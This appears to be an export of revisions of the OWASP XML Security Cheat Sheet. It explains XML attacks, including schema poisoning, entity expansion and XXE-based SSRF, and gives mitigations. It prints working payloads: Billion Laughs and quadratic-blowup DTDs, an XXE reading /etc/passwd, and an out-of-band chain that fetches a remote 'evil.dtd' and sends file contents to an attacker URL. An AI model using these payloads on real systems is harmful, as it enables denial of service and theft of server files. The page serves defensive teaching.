All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224435</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224435"/>
				<updated>2016-12-21T20:22:22Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
